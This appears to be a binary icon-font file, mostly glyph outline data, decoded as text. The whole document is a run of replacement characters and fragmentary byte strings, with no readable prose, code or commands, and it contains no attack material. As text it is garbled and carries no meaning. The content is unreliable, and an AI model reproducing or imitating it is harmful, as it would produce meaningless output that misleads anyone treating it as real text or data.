E�=I"32>7.#"&'.'>7>732>54&'1#"&54632T��j$$j��TT��j$$j���.KK.8�CC�8.KK.(F]55]F(�8((88((8/TvGGvT//TvGGvT/�M--M$&&$M--M,5]F((F]5,6(88((88��NZ#5##3353#"&'.'>7>732>5<1.'.#"32>7.'%2#"&546�������K.8�CC�8.KK.(F]55]F()F3 T��j$$j��TT��j$
 1�@(88((88@������!-M$&&$M--M,5]F((F]5.@O,/TvGGvT//TvG2
~8((88((8�@'P!!!5.#"32>7.'!2#"&546#"&'.'>7>732>54&'������ T��j$$j��TT��j$N0�:(88((88�8�CC�8.KK.(F]55]F(.KK.@�@|/TvGGvT//TvG8a'8((88((8��$&&$M--M,5]F((F]5,M--M�&7C`&".#"3267642.546>7>7.'%4&'32>7#"&'32>7.'�(�'R+T��j$X6�		`�� 1
z%8��K.=(B���'5]F(>E.KK.8�C9M-`2T��j$"c=��/TvG>i(�(`(��%z
1 (8�-M,)K=F)F'��(F]�EM--M$&M/TvGCq*���@�	�@@��@�������
	'!7!@@���@@@��@������@
���
)7FTcr��%2#"&=46"&=46322+"&5463+"&546;2"/&4762'&4762"%"'&4?6262"'&4?"32>54."&54632%%%%%%%%�%%@%%�@%@%%@%}-5.5��-5.5g5.5-��5.5-=5]F((F]55]F((F]5B^^BB^^�%@%%@%�%@%%@%�%%%%@%%%%�.5-5�.5-55-5.�<5-5.�(F]55]F((F]55]F(�`^BB^^BB^���"32>54.4>3".j��PP��jj��PP���<i�PP�i<�P��jj��PP��jj��P�P�i<�<i�
���(6DR`n}�"32>54.22#"&=46"&=46322+"&5463+"&546;2"/&4762'&4762"%"'&4?6262"'&4?5]F((F]55]F((F]5B^^B%%%%%%%%�%%@%%�@%@%%@%}-5.5��-5.5g5.5-��5.5-�(F]55]F((F]55]F(�`@^BB^�%@%%@%�%@%%@%�%%%%@%%%%�.5-5�.5-55-5.�<5-5.���
%
%%7'?������<<<<��*��pp��*33A��3�����`���v��$��$�����
%
%%'������<<<<�p��*�33A��3�����`���;�$��v���
%
%%������<<<<33A��3�����`����".#">54.�(J?22?J(8bI*f��NJ��i*Ib�2A""A2*Ib8q���po���m8bI*��� 2.54>32'7>3�8bI*i��JN��f*Ib8-R"N�`�><�*Ib8m���op���q8bI*&|�����]@����#"&54632#"333334&@8((88((8�%@P P@%`(88((88�%��������@%����&#"&546327'.#!"733333'7@8((88((8�1���1o&�{@ @{�&o`(88((88�8#��$�Z���@��@�Z����)D#"&54632#"&54632#"333334&7'.#!"733333'78((88((8@8((88((8���%@P P@%�1���1o&�{@ @{�&o`(88((88((88((88�%��������@%�#��$�Z���@��@�Z����';GS2>54.#"2#".54>2>7#".''4632#"&%4632#"&j��PP��jj��PP��jV�qAAq�VV�qAAq�V+UQL#7Vo??oV7#LQU�%%%%�%%%%@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�	 CtV11VtC �(88((88((88((88���+?"32>54.2#"&546!2#"&546".'32>7j��PP��jj��PP��V%%%%��%%%%�?oV7#LQU++UQL#7Vo�P��jj��PP��jj��P�8((88((88((88((8��1VtC  CtV1���'3?Q2>54.#"2#".54>4632#"&%4632#"&#".'7326j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%@R:FQ,,QF:Rf==f@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%��2#9))9#21<<���+>"32>54.2#"&546!2#"&546".'73267#j��PP��jj��PP��V%%%%��%%%%�,QF:Rf==fR:FQ,�P��jj��PP��jj��P�%%%%%%%%��)9#21<<12#9)���'3?L2>54.#"2#".54>4632#"&%4632#"&##"&=!5j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%�@8((8�@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%�@`(88(`@���,8"32>54.2#"&546##"&=!5!'"&54632j��PP��jj��PP����%%%%�@8((8�@%%%%�P��jj��PP��jj��P�%%%%��`(88(`@�%%%%���'3?R2>54.#"2#".54>4632#"&%4632#"&'>32.#"j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%��R:FQ,,QF:Rf==f@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%�N2#9))9#21<<1���+="32>54.2#"&546!2#"&546.#"'>32j��PP��jj��PP��V%%%%��%%%%�f==fR:FQ,,QF:�P��jj��PP��jj��P�%%%%%%%%��1<<12#9))9#���';GY2>54.#"2#".54>>7#".'64632#"&%".54632.j��PP��jj��PP��jV�qAAq�VV�qAAq�u4]J6:Xq@,SI<GU^�%%%%��2
8((8
2@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��
"-8 ?mP.*<$	q(88((88!!���1F"32>54.2#"&5462.#"&6546".'67>7#j��PP��jj��PP��V%%%%��-98##89�,SI<GU^14]J6:Xq@�P��jj��PP��jj��P�8((88((88''��*<$	

"-8 ?mP.���'5=AIk�2>54.#"2#".54>;2>=.'.53#535381267>323267>54&#"3!81267>323267>54&#"j��PP��jj��PP��jV�qAAq�VV�qAAq��(F]5�5]F(�@$�����$���**D00D�**D00D@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�`@5]F((F]5@�F&����&F,	$$			0DD0			$$			0DD0		���4V]ah"32>54.2#"&'.#"#81"&'.546!2#"&'.#"#81"&'.54633.3753j��PP��jj��PP��V0D**D��0D**D0��)G3�@�3G�P��jj��PP��jj��P�D0						0DD0						0D���/AP���-PA/���'IY2>54.#"2#".54>2+"&5#+"&=46;235463267#"&'7j��PP��jj��PP��jV�qAAq�VV�qAAq�v
&�&�&�&
�
�
`Ft"6:FQ,$E"4@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�
`&&&&`

  
�D8!#9)7
���$F"32>54."&'73267#+"&5#+"&=46;23546;2j��PP��jj��PP��j$E"4Ft"6:FQ,@&�&�&�&
�
�
�
�P��jj��PP��jj��P��7
D8!#9)�&&&&`

  

���'9Up2>54.#"2#".54>.#"'>32#"&5<1>7>36!>20#"&5467.'.j��PP��jj��PP��jV�qAAq�VV�qAAq�f==fR:FQ,,QF:


	%%4+
�
+4%%	


@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�S1<<12#9))9#�
	
%%$0







0$%%
	���.I["32>54.>7>36#"&5<%>20#"&5467.'..#"'>32j��PP��jj��PP��*4+



	%%��
+4%%	


�f==fR:FQ,,QF:�P��jj��PP��jj��P��$0




	
%%e



0$%%
	�1<<12#9))9#��7Jv�"&5<1>7>36#%.7>20#"&5467.'267#".'734&'.#".'32>54&'>".54>32�%4+



	%��


+4%%	
�=fR:FQ,,QF:Rf=
[: INT,,TNI :[
#  #P��jj��P#  #�V�qAAq�VV�qAAq�%$0




	
%�




0$%%
	�_<12#9))9#21<�"A:X''X:A"7d(8�Ej��PP��jE�8(d��Aq�VV�qAAq�VV�qA��+Fat4&'.#".'32>54&'>>7>36#"&5<%>20#"&5467.'.".'73267#
[: INT,,TNI :[
#  #P��jj��P#  #�@4+



	%%��
+4%%	


,QF:Rf==fR:FQ,�"A:X''X:A"7d(8�Ej��PP��jE�8(d��$0




	
%%e



0$%%
	��)9#21<<12#9)���'3?K2>54.#"2#".54>4632#"&4632#"&%4632#"&j��PP��jj��PP��jV�qAAq�VV�qAAq�*K55KK55K%%%%��%%%%@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��5KK55KK�(88((88((88((88���+7"32>54."&54632"&54632"&54632j��PP��jj��PP����%%%%�5KK55KK�%%%%�P��jj��PP��jj��P�@8((88((8��K55KK55K�8((88((8	���'3?LXdqu2>54.#"2#".54>#"&54632'2#"&5467"32654&##"&54632'2#"&5467"32654&#!!j��PP��jj��PP��jV�qAAq�VV�qAAq�*



 (88((88(B^^BB^^B`



 (88((88(B^^BB^^B���@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��


S8((88((8@^BB^^BB^�


S8((88((8@^BB^^BB^�@@���+7;G#"&54632#"&54632"32>54.4632#"&!5!7"&54632�



@



�j��PP��jj��PP����8((88((8�� (88((88 






�P��jj��PP��jj��P�`(88((88��@�8((88((8���'3?Z2>54.#"2#".54>4632#"&%4632#"&3&'.#&6767>'j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%VA96>xH%"#A96>xH%"#@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%��6a8>%"?#6a8>%"?#���+E"32>54.2#"&546!2#"&546&'.#&6767>'3j��PP��jj��PP��V%%%%��%%%%�>xH%"#A96>xH%"#A9�P��jj��PP��jj��P�%%%%%%%%��8>%"?#6a8>%"?#6a���'3?C2>54.#"2#".54>32654&#"32654&#"!!j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%��@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%�e@���#/"32>54.!5!2#"&546!2#"&546j��PP��jj��PP���@%%%%��%%%%�P��jj��PP��jj��P�@�%%%%%%%%���'3?Qb2>54.#"2#".54>4632#"&%4632#"&&"3>5&'!62#.56j��PP��jj��PP��jV�qAAq�VV�qAAq��%%%%�%%%%$P b\B.L"��P b\B.L@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�%%%%%%%%�P"@& "P"@& ���+S"32>54.2#"&546!2#"&546"&'.5#.56762467627&j��PP��jj��PP��V%%%%��%%%%� b\B.L"PP"K/B\b�P��jj��PP��jj��P�%%%%%%%%�Y$$"@& "$$" &@"���'+7C2>54.#"2#".54>'4632#"&%4632#"&j��PP��jj��PP��jV�qAAq�VV�qAAq�@�K5%%%%�%%%%@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�L�L�%%%%%%%%���+0"32>54.2#"&5464632#"&'%j��PP��jj��PP��V%%%%�[%%%%K��K�P��jj��PP��jj��P�%%%%@%%%%�5L�L����'3I^2>54.#"2#".54>#"&54632"&'&""'&4762#!"&'&""'&4762j��PP��jj��PP��jV�qAAq�VV�qAAq��K55KK55K�6

		"j"		@6

		"j"		@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��B^^BB^^
		

!!

		

!!

���(4I"32>54."'&4762#"&'&""&54632#"&'&""'&4762j��PP��jj��PP����

		"j"		6�5KK55KK�6

		"j"	�P��jj��PP��jj��P��		

!!

��^BB^^BB^�		

!!
���/=GKUt�.#&3265<1.'"32>54.3!267#"&'7546;#"&533532#>=4&#!".54>32"032654&'>7>'.n+



	%%4�j��PP��jj��PP����	
�
	8�OO�8	pp	��@p		H/!� !/08Aq�VV�qA8�+4%%	



�




	
%%$0P��jj��PP��jj��P��0880H`	�		���	`		
`!//!`
	8�OV�qAAq�VO��

0$%%
	


���	
+Faq;5#"73#%#326=4&"32>54.>7>36#"&5<%>20#"&5467.'.#!"&=463!2	pp	���0pp		�j��PP��jj��PP��*4+



	%%��
+4%%	


B/!� !//!�!/0`	�		���	`	�P��jj��PP��jj��P��$0




	
%%e



0$%%
	�5!//!`!//!	���'5C^lz��2>54.#"2#".54>#"&546;2!#"&546;2"&'.#""'&47>32"&=4632"&=4632%"&=4632"&=4632j��PP��jj��PP��jV�qAAq�VV�qAAq�v�

�
�3�

�
�%!!%

		MM		z






�3






@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA��







�(		




@

@
�
@

@
�
@

@
�
@

@
���!/=Xft�"32>54.#"&=46325#"&=46327#"&546;2#"&'.#""'&47>327#"&=46325#"&=46327#"&546;2j��PP��jj��PP����







 �

�

%!!%

		MM	�







 �

�
�P��jj��PP��jj��P� 

@

�

@

`



�1		


e

@

�

@

`



@����>J�54&#".#".#"54&#"'.#"21#"3!26=4&+7>5#"&546325!.546322127>54632326546323265463232654632�8(


+!

!8((8�
(8�-

�

,I@



T����
�













`�(8

�(88(�u^8($
�
�

�
��


��	
w�

��







 



�>J�%32654&'>54&'>54&'32654&#!7>54&#""154&+";26=3%"&546323'>3213!2#!"32#"32+"32+��(8

�(88(�u^8($
�
�

�
��


��	
w�

��







 



�8(


+!

!8((8�
(8�-

��

,I@



T�"
�













@����>J�#"&'#"&'#"&'#"&5#"&54672417#"&=463!2+4&#"326'!32672617623265463232654632326=46323265�8(


+!

!8((8�
(8�-

�

,I@



T����
�













 �(8

�(88(�^8($
�
�

�
�


����
w�@

@







 



�>J�%#"&5467.5467.5467#"&5463!'.5463221546;2+"&=#%2654&#"#7.#"1#!"3!2#"32#";2#"3`�(8

�(88(�^8($
�
�

�
�


����
w�@

@







 



8(


+!

!8((8�
(8�-

��

,I@



T�"
�













����!/	!5"3!26'1.#1#"&54632'"&=4632����
�K%3f3%�K
@%%%%@%%%%c��W]��,@@,g��%%%%e%�%%�%���(=AE"32>7>54.'.#512#".54>3#3#*PKD--DKP**PKD--DKP*j��PP��jj��PP��*����`-DKP**PKD--DKP**PKD-`P��jj��PP��jj��P�@�������8M3#2#575!57"32>7>54.'.#512#".54>���%������*PKD--DKP**PKD--DKP*j��PP��jj��PP���@%��@�@��-DKP**PKD--DKP**PKD-`P��jj��PP��jj��P���#!4&+"!"3!;265!26=4&�
�
��

`
�
`
@`

��
�
��

`
�
@@3!26=4&#!"
�

�@
 �

�
���-A46;2+"&5!535#533"32>54.".54>32�  ��@@�@�j��PP��jj��PP��jV�qAAq�VV�qAAq�� �P@�@��P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA���'3"32>54.".54>32'77'7j��PP��jj��PP��jV�qAAq�VV�qAAq�J��`��`��`���P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA���`��`��`�����(4A.#"32>7>54.'>32467#".5j$T\c33c\T$$8&&8$$T\c33c\T$$8&&8$&!��/q>O�i<�&!/q>O�i<*$8&&8$$T\c33c\T$$8&&8$$T\c33c\T$��>q/!&<i�O>q/��!&<i�O����S%81	81>76&/.81	81.'&81	817>781	816?>'.���7�	���	�7���	77	��77	���7�	���	�7���	 @	'	`� ���@� ���*V
%7	''��s�������!Y�R�Y*����������X�Y�X@����
048>334&+"33#%5#";5#54&+326=4&#26#535#53	7��@&�&@��@�&&���&��&@�����`�R�`���&&�����@&��&@@``&�@&`&&ƀ@���@ F�.@���!5!55!3!%!#���@�������@@��@�����������@��@����5!5!5!%!#!!5��@�������@�@��������@���������'*"32>54.".54>32
j��PP��jj��PP��jV�qAAq�VV�qAAq������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA������'+/"32>54.".54>323#3#j��PP��jj��PP��jV�qAAq�VV�qAAq��ꀀ���P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA`��������'+"32>54.".54>32!!j��PP��jj��PP��jV�qAAq�VV�qAAq�������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA`�����'*."32>54.".54>32%3#j��PP��jj��PP��jV�qAAq�VV�qAAq�������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA����������'*.2#".54>2>54.#"%#3j��PP��jj��PP��jV�qAAq�VV�qAAq�������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA����������'*-2>54.#"2#".54>'7'7j��PP��jj��PP��jV�qAAq�VV�qAAq�����@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�����������'*-"32>54.".54>32j��PP��jj��PP��jV�qAAq�VV�qAAq��������P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA@��@���@@@	����@�����@�@!!!!�@���@��@���@�@!!��@��`� @@���� ��@�@@��`�`` %��@``@�����@���@�@73��@@����@��@��@�@@��@���@�@#������@@@�`��@�����@��`@�@%3�@��@��@�@@��@@@#���@@�`�����`@@7!!	!�����@~#C\w%"&'&47>54.'&4762#'"&'&47>4&'&4762#1'"&'&47>4&'&4762"&/#"&546;7>z	!3""3!((=))=(	�
1111'/  /	�	(,--,��s

s�			&(!LSZ..ZSL!(([el88le[(Z'2{�{2'GMT++TMG[(MPM(,qtq,��
@
�
��
p~8S%"&'&47>4&'&4762#1'"&'&47>4&'&4762"&/#"&546;7>�
1111'/  /	�	(,--,��s

s�			�'2{�{2'GMT++TMG[(MPM(,qtq,��
@
�
��
G~3%"&'&47>4&'&4762"&/#"&546;7>%	(,--,��s

s�			�(MPM(,qtq,��
@
�
��
�~%"&/#"&546;7>��s

s�			�
@
�
��
�~*#'#57'5373"&/#"&546;7>�UkkUkkUkkUk�K�s

s�			UUkkUkkUkkUk�@�
@
�
��
~&##5#53533"&/#"&546;7>���������s

s�			��������
@
�
��
~!!"&/#"&546;7>�`�s

s�			����
@
�
��
���!	!3!5	5!#�����������������������2.#"34>32!#".'7!732>5z#U`j8j��P`Aq�V.WOE�`�&Aq�V.WOE����#U`j8j��P&>+P��jV�qA$3 �`���V�qA$3 ����&>+P��j��';P%"&/#"&'.5467>327>32'3267>54&'.#"%"326?'.#0X"ff"X00X""$$""X00X"ff"X00X""$$""X�5555g��555gg5�$"gg"$$""X00X""$$"gg"$$""X00X""$�55f�55ff���`%#'737'#"'.+3#326?;7'e��e��
	��	
������
	��	
��������
	��	
����
	��	
������7	7	! ��� ����  ����	!!!�  � �� ����		 ��� ����� ������	!!� ���������		!���� ���� �� ����!!!���� �����	'	� ��@ ���  ���!! ����  � �@m@!%32654&#!"1326=326764m���%%��!%%		�%%
��%%��
		
6�mm	&"2?3265326764'm��6��6�%%�		-@��6��%%e�
		
6�S�@"732654&'.#1!";27�%%
��%%��
		
6S�%%�!%%��		@S�-%64'&"!"3!2m@��6��%%e�
		
6S@6@6�%%�		�@�@"#"3!267>514&#".#"��%%�!%%��		��%%
�%%�
		
6�m�	"'&476246327>32m��6��6�%%�		S��@6�e%%���
		
6�@�-"	54&#"31!2654&+>54&'&"��%%
�%%�
		
6-���%%��!%%		SS�-%&4762!2#!"���@6�e%%���
		
6S@6@6�%%�		���'-32>54.#"#".54>327	7P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�Z���Z��j��PP��jj��PP��jV�qAAq�VV�qAAq��Z��Z����'-"32>54.".54>32'	j��PP��jj��PP��jV�qAAq�VV�qAAq��Z��Z��P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA�ZZ����'-4.#"32>%4>32#".7	'P��jj��PP��jj��P�`Aq�VV�qAAq�VV�qA�ZZ��j��PP��jj��PP��jV�qAAq�VV�qAAq��Z��Z����'-2>54.#"2#".54>'	7'j��PP��jj��PP��jV�qAAq�VV�qAAq��Z��Z�@P��jj��PP��jj��P�Aq�VV�qAAq�VV�qA�Z���Z����3#!3#!!'7%!5!5�@@�@@@@��@����@������@�������@�
"&*.33'3#73#73#3#73#73#'3#%3##5%!!�@���� ``�``�@@�@@```�``�@@@@���@������@@@@@`�`@@@@�`@`��@��@�
"&*.##7#5%!!3#73#73#3#73#73#'3#%3#@��������@��``�``�@@�@@```�``�@@@@��������@���@@@@`�`@@@@�`@` ����%@D%##7!"&'&47#"&5463!232#.#"326?37>'%7#@������	��

	��

]�		�		7�7	��LL�����	N

	��

n�

��		nn	��� ����%@C%##7!"&'&47#"&5463!232#.#"326?37>'%7@������	��

	��

]�		�		7�7	��LL����@	N

	��

���

��		nn	��� ����26%##7"&5#"&546;2#";#";2654&3#@�����
 

@
3�

��

�
�������@
`


��
�
�
�


�
@� ����26%##7"&5#"&546;2#";#";2654&3#@�����
 

@
3�

��

�
�������
`


��

�
�


�
@� ���
%##7'!!!!!!3#@���� @����@@��������@�@�@� ���
%##7!!!!!!3#@���� @����@@���������@�@�@��@�@/:EIT_%"&=##"&546;5#"&54632354632+3232654&#!"326=735#732654&#"%";54&�B^�^BB^^B``B^^BB^�^BB^^B``B^^�8((88(�@(88((8@���`(88((8��(88(`8@^B``B^^BB^�^BB^^B``B^^BB^�^BB^`(88((88((88(`@�@8((88(`8((8`(8�@^7(%!"&5#"&'&6762+%!46;'32���
�
@

@
���
S��S
@
`		@		��		��
@`
��
�@"&/'.7>32���	

	�

�	
��
		
�
	@��&%!"&'!"&5463!232#!"&5463!2��	���

@	��

��

@
�
	-


	��

@



���!"3!2654&'7��5KK55KK��Z�3Z�K5�5KK55K���Z�2Z���!"3!2654&!!��5KK55KK5��K5�5KK55K�����'3"32>54.".54>324632#"&j��PP��jj��PP��jP�i<<i�PP�i<<i���pPPppPPp�P��jj��PP��jj��P��<i�PP�i<<i�PP�i<�PppPPpp���"32>54."&54632j��PP��jj��PP��j5KK55KK�P��jj��PP��jj��P��K55KK55K���'"32>54.".54>32j��PP��jj��PP��jP�i<<i�PP�i<<i��P��jj��PP��jj��P��<i�PP�i<<i�PP�i<���7'!5##3!3535#!@�@��@�������@��@@��@�����������@@�����#37Gm�#";26=4&326=4&+"73##";26=4&#53%#";26=4&7#"&'.=4&#!";23!2654&#!"&'.=4.+"&'.5467>3!2;2@�&&�&&f�&&�&&�����&&�&&���&&�&&&@@u-.0K5�5KK5@@u-.0K55KK
		
�
		
<i�P@
		

		

		
<i�P@
		
@&�&&�&�&�&&�&����&�&&�&��@&�&&�&�0.-u@@5KK5�5K0.-u@@5KK55K��
		

		
@P�i<
		

		

		
@P�i<
		
���/?OSW[_cgkosw{��+"&=46;2+"&=46;2+"&=46;2+"&=46;275#'#37353#3#3#3#3#3#3#%3#'3#'3#3#73#%3#'3#�``@``��``@``�p0pp0pp0pp0�@@@@@@@@@@@��@@@@��������@�������������```�````p0pp0pp0pp0��@����@���@��@@@@@�@@@@@@@.��9Ua}.'>'./.'.>767>&81'.'&67>7>"&54632&'81.'.7>76�AFDP�
��
�PDFADFA��AFD�@44�


s44'8| 0'��T'0��|8''RK=7'��'7=KRQ$$6#$6 



��$$6$#6���B"326554.>7>32#".'.'.'>7j��P�K55K�P����2!KQW,,WQK!22!KQW,,WQK!2�,:!`����%%@�`!:,�
				

				
e����%"&#"3.54670
!37#73267 DhFq�m5IH
eJ KxY=l�,�4-U&.P=�;a}AM;&7�o����#��	7k	��f�a%81#5467>7>323267>54&'.'.#"#3+!5#"&58132!5"&5��	





':.S$$8~~	&�D1�8%&E!X�=n

(

"
<&#w<H��6(
88&SN&,�,$
88A�\�v%"&'.5461.+"#"&#"+";21#">326&#"&'.'546;>54&+"&=4>3281#">326&#WL
@#,!EgC!<NI
-F-*G,L�
�%5"/GI
-F-*G,+@$=C!"6`�P.1]I,<%$@$�!
51YD(Pv�L<%$�	%3'3#7#%'#3!53#����������@������@���������@@@��@����	%'7!55'#3!53#����@@������@@��������@���@@@��@���@!######5!@������������������@�$>54.#!!2>54&32+#32� (F]5���5]F(D��e*<<)f���,>>�"T/5]F(��(F]5FtFK55K��K55K�@�3#".533267>5!!��2WuBBuW2�I((I������`<iN--Ni<��`88������#3!53#5������@�@��@�@@@�=##"&'.5332654&#!5!.'.5467>32#4&#"32�50,q>>q,05�rNNrrN�,0550,q>>q,05�rNNrrN;n+�@A"5b$!$$!$b54LL44L@$b55b$!$$!$b54LL44L!���3%!7!5>54.#"!!5.54>32�@��1R<!7`�II�`7!<R1��@FvU/P��jj��P/UvF@���H_p>P�g;;g�P>p_H��!Sl�G]�zFFz�]G�lS���%73!5	5!#'.#!	!26�,&@�@L���,"6:�ja��WB�_��J�L�'7"����8���#3#73#%3#73#%3#!3!!#!������������� ��@ ���@@@@@@@@@@�@��������@�����3#575#53#'#	373�����܈����������2@�<2@�n����������%3#575#53#'#	373�����܈���������22@�<2@�R������P��
@?!3#33#7#"&546;2654&+";2+";2654&'.�::r��r�H:�:d���@

�

�(8

%@

�

�(8

%�����������



8(!




8(!
P��
@?!3#33#7%#"&546;2654&+";2+";2654&'.�::r��r�H:�:����@

�

�(8

%@

�

�(8

%������������



8(!




8(!
��0%7!3#33#B::r��r�H:�����������"!#!!3!%3#'3#%3#73#%@����@��@���������������@���@����@�����@@@@@@@�����7!!!#!5!''7'77@����ѷ�����"��>��>��>��@���@�����>��>��>��
@#'!5!!5!5#!5!!%!!=!!!!5!����@���������@��@��@������������������
�#'!5!!5!5#!5!!%!!5!!!!5!����@����������������@��������������������#'/37?CH3#73#%#535#53#73#%3#33#73#%#535#53#73#%3#3!!1!������@��@�@�������@��@�����@��@�@�������@������@�@@@@�@�@�@@@��@@��@@@@�@�@�@@@��@@@���������!####".54>�����5]F((F]�������(F]55]F(���"333335	5]F((F]5�������(F]55]F(�������@���"333335	5]F((F]5������(F]55]F(���������������"&'.5467>323267>54&'.'.'.5467>7.'.5467>321#"&'.5467>54&'.#"#>54&'.'.'�%>
	

		
	4%<P-	
F(&?

	




,?X-		E)2$#

:+!%$
6($@2
	
				

-)F58) &$>1
	

	')K!47*
%%?�23
2!/�!!!!!!!!!!�����������@���@����!!!!!!!!!!�������������@���@����!!!!!!!!!!��������������@���@����!!!!!!!!!!�������@�@�@�@��!!!!!!!!!!����������������@�@�@�@����!!!!!!!!!!%�����������������@�@�@�@�����@@
0>3	"!3>7>7!!S�z���`�`0���~!O,�F@�@<H<��7Zs��	/��
V@��
!!!'!'7�@����@ @�@��`�����@���@��@���`��� ��%	%'	7'@`@��`�`��@`��`@@`��`����`� W�)%	%'	7''@`@��`�`��@`��F�F�`@@`��`����`�i�@�#!!!!!###53535#5#5333#53@���@��@@@@@@@@@@@��������@��@@@@@@@@@@�@���3"%>54&'%32654&#".#"326732654&`";�Q�;"B^^BB^�Q;"B^^B";�^BB^^�

�^BB^^B
�^BB^�
B^^BB^���#/9!"3!2654&!2	>3<5.5!"&'77#7'7U�VGddG�Gdd�d
���
@��@�	�ZZ�	@���dG�VGddG�Gd���I�@�ۺ	@�ii�@	�������+!"3!2654&2	>3!*#'	'*#!U�VGddG�GddG������V�������V�dG�VGddG�Gd���-�9�c�0��������!"3!2654&'7	7U�VGddG�Gdd�N�II��I��dG�VGddG�Gd��N�����
�Z��0����'2<"32>54.!2	>3<5.5!"&'777'7j��PP��jj��PP����
���
@��@�	�ZZ�	<���P��jj��PP��jj��P���I�@�ۺ	@�ii�@	��������-gu%#".'&632>767&&76&7>'%3>76&'.=4&'.#"267>32326767#"&5463�*elo5J��s2
	6x��E.aca/.]1|		-

��9	-$i-,YL8

x8#'
5�2:JkNAW3|-#(uBK0 2H-2#

5!z%XJ1	0+�=m*",H7

&$0eK``&4!-$? 2'O-
����,!#".54>327.#"32>54&'
##DkLAtV22VtAKe�!MV_4j��QQ��jo��G	�LD03WvCCvW33�2#P��jj��PJ��m)���9!"3!2654&".54>32.#"3267#5!#���(88(@(88�@P�h<<h�PM�2hK82VA%%AV2ra�j5`�S�8(��(88(@(8��<i�PP�i<5/e&&BX22XB&{*�R�c8���="32>54.".54>32.#"3267#5!#j��PP��jj��PP��bP�h<<h�PM�2hK82VA%%AV2ra�j5`�S�P��jj��PP��jj��P��<i�PP�i<5/e&&BX22XB&{*�R�c8�)53#".54>327.#"32>54&'!%#5##3353F�Ra*I7  7I*/@X+mBDvY33YvDFtR-���``````�p$i!7K++K7!!U(-3YvDDvY3/UuF
	`````���5A!"3!2654&".54>32.#"3267#53###5#53533���(88(@(88��5]F((F]54V"F3%B]]BLA��#A[7@@@@@@�8(��(88(@(8�(F]55]F($C_CC_SX

7\B%@@@@@���9E"32>54.".54>32.#"3267#53##5#53533j��PP��jj��PP���5]F((F]54V"F3%B]]BLA��#A[7�@@@@@�P��jj��PP��jj��P�(F]55]F($C_CC_SX

7\B%@@@@@@F����%"3>54.##5#53#5#53\�xEIz�We�t>Ex�[@%��@%���Fx�[W�qB�3���U[�xF�(8`��(8`���!'!	��E����(���޹"@��@@���	������35#"#3337#546`��.R=#���� ��#=R.`���`
���#!"3!#53546;#"3#!2654&���(88(���qO��&� � (88�8(��(8��@Oq�&@��@8(@(8���+H!"3!2654&46;2+"&52#"&5461#!"&51332>54&'3���(88(@(88��
�

�
�OqpPOqp�
�@
F2WuBBuW2F�8(��(88(@(8�

�

 pPOqpPOq��

� BuW22WuB!����?�.#"%31812>54.1"&/7'.54>32#.'&"'.'.'&67>7>76&'.'.#&"#"7>7>'.'i$S[b3i��P""H
7{@i��P&7�u9m1�+
 !Cr�W+QLE. Cr�W�	D		
	
8$$
	$/!8N0$(;
+$8%P��iC�:��GP��i3b[S�	)�2s<W�sB.ELQ+W�rC<!
	" 6			G		2//N-<?

#"���)@V"32>54.'.&'&67>7'.&'&67>7.&'&67>j��QQ��jj��QP���-fq{D
I�}q2
8
4~��<F���<	
=���;"D���G
	
(�Q��jj��QQ��jj��Q�!


&�
		 )
.% 
�%)

"/*
(
	���)"32>54./#"&/&67%6j��PP��jj��PP���T�=

,~��P��jj��PP��jj��P���t
	_<�'
�@G>7.#".'.'#"&'#"&'32>54&5>7= !0C$P-+M9!A{n`'
3*1aH


kE6�J
#LQV,�ߘN5�
<%$!9L,"9N066\Lt>R*0#
m��h
7 ?����@#".5463207>54.#".'#27>72675�&0T>#)%
CQ9U78Y> 0F,%[1,SF7�nug0HTU ? �!@\::;66?@&^,;\@!)Hb:8hXFJ16��׋���aBa{Dz���o!"3!2654&0"'.101#0&'.10&7>1701076&10&'.#&67>3267>106761702���(88(@(88�]0*p="<.e"	-	
 #	j  5,*+�8(��(88(@(8�3C:?#_V<	26 ^%6:,	;65+G)''
���!2>53.53267.'�Z�rA-CoQ-�Z�rA-CoQ-Y.@N-7|BC|6,O@.�Z��_/ZSL! g��UCZ��_/ZSL! g��UC��1[QE!!EQ[1�9:Up}��%.'&>76.7>'&076&'.32>54&'.17616716&.7161676&''.7>'.7>7&676&�?sY8)Nm?@sY7)Nl

~NJ[e1$8'Ky�Ph�zBP,�2�E0c$$�D!

!
�e7.
-
><y.=@�7>/E)*N?+/D**N?+k5#!'>$E0$JIG"?eF&7Uf0;D
68+
((e/B�%


